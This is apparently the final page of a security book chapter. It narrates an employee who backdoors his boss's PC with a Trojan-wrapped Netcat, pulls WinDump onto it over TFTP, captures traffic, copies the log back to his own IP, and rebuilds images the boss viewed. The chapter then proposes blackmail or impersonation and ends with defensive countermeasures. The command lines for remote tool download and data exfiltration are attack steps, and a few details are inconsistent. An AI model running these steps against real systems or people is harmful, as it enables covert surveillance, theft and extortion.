Chapter 2: Discover What Your Boss is Looking At

Addison-Wesley Professional

1 2 3 Page 3
Page 3 of 3

Phoenix’s next step is to download a packet-capturing software program onto Mr. Minutia’s machine. He decides on a command-line program because he cannot view a graphical user interface (GUI) remotely with Netcat. Because Windows comes with a TFTP client, Phoenix can set up a TFTP server on his computer and download a packet-capturing software program onto Mr. Minutia’s computer. Phoenix uses the TFTP server available at Sysinternals (http://www.sysinternals.com). Phoenix prefers this software because it is free and he does not need to perform any configuration; simply launching the program is enough. Phoenix also downloads WinDump (http://www.winpcap.org/windump), a popular packet-capturing program, and places it in the TFTP-Root directory (the default directory used by Sysinternals TFTP server program).

Phoenix goes back to the Netcat connection on his boss's computer. From there, he downloads WinDump from his computer. The syntax for the Windows TFTP client is

tftp [-i] host [put | get] source destination

The -i switch configures the TFTP client to do a binary transfer (WinDump is a binary file, so this is the appropriate option to use). Phoenix’s IP address is 192.168.1.6, so he types the following on his boss's computer to download WinDump:

tftp -i 192.168.1.6 get windump.exe windump.exe

Next Phoenix launches WinDump, which has many options. The options are case sensitive, so he needs to be careful when typing in commands so that he does not mistype and cause the program to hang. Phoenix is concerned only about the following options:

  • -c count—This option captures only a certain number of packets. Without this option, WinDump continues to capture software and fills the log file.

  • -s snaplength—This option specifies the length of the packets captured. Without this option, some packets will be cut off and Phoenix will not be able to reassemble them.
  • -w filename—This option logs all captured packets to a log file.

Typing the following on his boss's computer will capture up to 1,000 packets and send them to the file capture.log:

windump -c 500 -s 1500 -w capture.log

Now the waiting game begins. Phoenix must wait until his boss sends or receives 500 packets. Phoenix knows when this occurs because WinDump stops running and returns him to a command prompt.

WinPcap

WinDump, like most packet-capturing software, requires the use of the Windows Packet Capture library (WinPcap). WinPcap is available at http://www.winpcap.org at no cost. Many network utilities use this library, so in a situation like the one in this chapter, chances are good that a network manager working in information technology already has WinPcap installed.

If the network manager does not have WinPcap installed, Phoenix must copy the files and manually install them. Normally, WinPcap uses a graphical install, but using Netcat to connect to a command-line interface of his boss's computer will not allow Phoenix to view a graphical install utility.

In the event that Phoenix has to install WinPcap using the command line, he takes the following steps:

  1. He downloads WinPcap, but does not install it. Instead, he uses WinZip to unzip the self-extracting executable.

  2. Using TFTP, Phoenix copies daemon_mgm.exe, NetMonInstaller.exe, npf_mgm.exe, rpcapd.exe, and Uninstall.exe to a directory such as C:\Program Files\WinPcap on his boss's computer.

  3. Copies netnm.pnf to c:\windows\inf.

  4. Copies packet.dll, pthreadvc.dll, wanpacket.dll, and wpcap.dll to c:\windows\system32.

  5. Copies npf.sys to c:\windows\system32\drivers.

  6. Navigates to the directory created in step 2 and runs these commands:

    npf_mgm.exe -rdaemon_mgm.exe -rNetMonInstaller.exe i

Phoenix would now have the Windows Packet Capture library installed on his boss's computer.

Analyzing the Packet Capture

When WinDump finishes, Phoenix should have captured enough packets to reconstruct whatever his boss has been doing across the network. He doesn’t get too excited, though, because he knows he must first copy the log file over to his computer. He uses TFTP just as he did earlier to transfer the file. This time, though, he will be transferring a file from Mr. Minutia’s computer to his computer. Phoenix types the following command on his boss's computer to transfer the file:

tftp -i put 192.168.1.6 capture.log

If Phoenix tries to open the log file in a text editor, he will discover it is difficult to read. To make it easier to interpret the output, Phoenix is going to import the log file into Wireshark (formerly Ethereal), which is available at http://www.wireshark.org. Launching Wireshark, he goes to the File menu, chooses Open, and selects the capture.log file. Figure 2.22 shows sample output of what Phoenix might discover from this file.

Figure 2.22

Figure 2.22

Wireshark

Now Phoenix starts to see something interesting. Notice in the highlighted portion that there is an HTTP (HyperText Transfer Protocol) request to GET a file called gambling.jpg. Could it be that his boss is going to gambling sites during work hours? To find out, Phoenix must follow the TCP stream and reassemble the file.

By right-clicking the HTTP GET request, Phoenix can choose the option follow TCP stream. Doing so brings up the window shown in Figure 2.23.

Figure 2.23

Figure 2.23

Following a TCP stream

The beginning of this output shows an HTTP GET request followed by the response from a Web server. His boss was apparently browsing the Web during the time Phoenix was capturing packets. Phoenix wants to see any graphics that were on the Web page his boss was looking at. Unfortunately, graphics are binary files, so he will not be able to view the image. Phoenix isn’t worried, though, because he can reassemble the image using a hex editor.

Reassembling the Graphics

Phoenix saves the output in its raw format by clicking the Raw option (in the lower-right corner) and then clicking the Save As button. He saves the file as output.raw.

Next he launches WinHex (http://www.x-ways.net/winhex/), a popular hex editor for Windows, and selects File, Open to open output.raw. Figure 2.24 shows how the raw data appears in WinHex.

Figure 2.24

Figure 2.24

Raw TCP stream in WinHex

This does not look like much just yet, but he will soon re-create the image into its original form. Phoenix knows that he must first remove the HTTP GET request header and leave only the graphics (if there was more HTTP code after the graphics, he would have to remove that as well). To do this, he must remove everything before the start of the binary graphic file. JPEG graphics start with the characters ÿøÿá. Using his mouse, Phoenix highlights all the text in the third column up to ÿøÿá. To remove the HTTP header, he selects the text to remove and then presses Ctrl-x to cut it out of the file. He now has the source graphics file, so he can go to the File menu and choose Save As (shown in Figure 2.25).

Figure 2.25

Figure 2.25

Saving the source graphics file

Next, he opens up the image he just reassembled (see Figure 2.26).

Figure 2.26

Figure 2.26

Image Mr. Minutia was looking at

Aha! It appears his boss might have been looking at an online gambling site during work hours. Phoenix has now confirmed that his boss is setting a double standard: Mr. Minutia expects Phoenix not to surf the Internet during work hours when Phoenix has just confirmed that Mr. Minutia is guilty of surfing the Internet himself. Armed with this knowledge, Phoenix can use it for social engineering, blackmail, or just to joke about it with his coworkers.

Phoenix prints out the image and leaves a copy of it on his boss’s desk the next morning before the boss arrives. Later that day, a memo is sent to all employees saying that Internet usage will no longer be monitored. Phoenix grins as he realizes his plan worked; his boss was caught and will no longer be monitoring his Web surfing.


File Headers in Hexadecimal Output -

You can also look directly into the hexadecimal output to determine the file type. For example, JPEG files will have the hexadecimal value FF D8 FF. To see this and other header values for various file types, visit http://www.filext.com.


Other Possibilities

Although the example shows Phoenix’s boss only viewing an online gambling site, the variety of what he might have seen is limitless. What if the boss was looking at pornography? Imagine how Phoenix could have used that to blackmail him or get him fired. In fact, according to a 2005 PC World survey, nearly half of all American Fortune 500 companies have dealt with at least one incident of an employee viewing pornography on their computer at the workplace.

Perhaps instead of online gambling or Internet porn, Phoenix might have been able to capture his boss sending a plaintext password to a Web-based e-mail site. With that password Phoenix could log in as his boss and send e-mails to Mr. Minutia’s friends in his contacts list with lies about him, such as how he wants to confess his drug and alcohol addiction or how he is having an affair.

The possibilities of what Phoenix might discover while spying on his boss are limitless.

Chained Exploit Summary

Let’s review the steps Phoenix used for this chained exploit:

  1. He copied down a legitimate Web site to set up a phishing scam.

  2. He used a Trojan wrapper to combine Netcat with legitimate software.

  3. He hosted a new Web site and sent a spoofed e-mail to his boss.

  4. He scanned his network to find the IP address of his boss's computer.

  5. He connected to his boss's computer via Netcat and, using TFTP, downloaded WinDump.

  6. He captured packets being sent to and from his boss's computer while his boss surfed the Internet.

  7. He copied the captured packets back to his computer and opened them using Wireshark.

  8. Upon seeing that there was a graphic being transferred, he saved the output as raw data and opened it in WinHex.

  9. Using WinHex, he removed the HTTP header, saved the original graphics file, and opened it.

Countermeasures

Now let’s examine the various countermeasures you can deploy in your environment to protect against these kinds of attacks.

Countermeasures for Phishing Scams

Setting up a fraudulent Web site to appear as a legitimate Web site is known as phishing. Most people think of phishing scams as an attempt to capture passwords or credit card information but, as you have seen in this chapter, such scams can be used for much more. Phishing scams are first and foremost a social engineering tactic. Protecting against these attacks involves both human and technical safeguards.

The human safeguard is training. Offer routine training, post signs, and train all new employees on the dangers of social engineering tactics. Train them not to open e-mails from people they do not know and not to visit Web sites that appear suspicious. Explain that they must be especially wary of any e-mails that instruct them to download software from a Web site they are not familiar with.

Technical safeguards include installing spam filters and anti-phishing solutions. Most phishing scams, including the one used in this chapter, are sent in the form of spam. Having both a central spam filter for all incoming e-mail as well as spam filters on users’ computers will help to protect against these attacks. The other technical safeguard, anti-phishing solutions, can help to some extent but are not the end-all solution. Both Internet Explorer 7.0 and Mozilla Firefox 2.0 contain anti-phishing measures. You can also install anti-phishing toolbars from Web sites such as Netcraft.com.

Countermeasures for Trojan Horse Applications

Just as with phishing scams, protecting against Trojan horse applications involves both a human and a technical element. Train your users never to install unauthorized software on your network. Have a policy that states not only the prohibition of installing any software not approved by a network manager, but also states the consequences for doing so.

The technical solution is twofold. First, make sure you have the latest signatures for your anti-virus software. Most anti-virus software solutions detect Netcat. However, variants of Netcat are constantly coming out. One example is Cryptcat (http://farm9.org/Cryptcat/), which is an encrypted version of Netcat. Also there are underground organizations that will, for a price, alter any program you have (such as Netcat) so that it does not match any known signature. For example, EliteC0ders was known for altering executables to make them undetectable. According to its Web site (http://www.elitec0ders.net/), it no longer offers this service.

Second, use a group policy across your domain that prevents users from installing software on their computers. Although some users (especially management) might not like this, you can help minimize complaints by reassuring them that protecting themselves and the company against attacks is in their best interest.

Countermeasures for Packet-Capturing Software

If the attacker has gotten far enough to run packet-capturing software, you have more problems to worry about in addition to the attacker capturing a few packets. Nevertheless, you can do a few things to protect against packet capturing. First, to protect against the loud attacks discussed in the "For More Information" section earlier, use switches with port security turned on. Port security protects against ARP poisoning, MAC spoofing, and MAC flooding by allowing only certain MAC addresses to connect to a given port on a switch.

Second, use an IPS to alert you and actively protect against any type of ARP poisoning or MAC flooding. An IPS can alert you should an attacker try to capture traffic on a network.

Third, you can use an application such as PromiScan (http://www.securityfriday.com/products/promiscan.html), which scans your network to see whether any hosts have set their interface to operate in promiscuous mode. Packet-capturing software applications often set the network interface card to run in promiscuous mode, so utilities such as PromiScan might alert you to anyone running packet-capturing software on your network.

Finally, use host-based intrusion detection software, such as Cisco Secure Agent, or firewall software that will alert you anytime a new application is attempting to launch. This could warn you that someone is trying to run packet-capturing software on your computer.

Conclusion

Phishing scams, Trojan horses, and packet-capturing software are all threats to today’s networks. Network spying takes place all the time. Employers spy on their employees, employees spy on their employers, and companies spy on each other. Ultimately, you choose to give up your privacy any time you log in to your company’s network.

© Copyright Pearson Education. All rights reserved.

Join the Network World communities on Facebook and LinkedIn to comment on topics that are top of mind.
Related:

Copyright © 2008 IDG Communications, Inc.

1 2 3 Page 3
Page 3 of 3
SD-WAN buyers guide: Key questions to ask vendors (and yourself)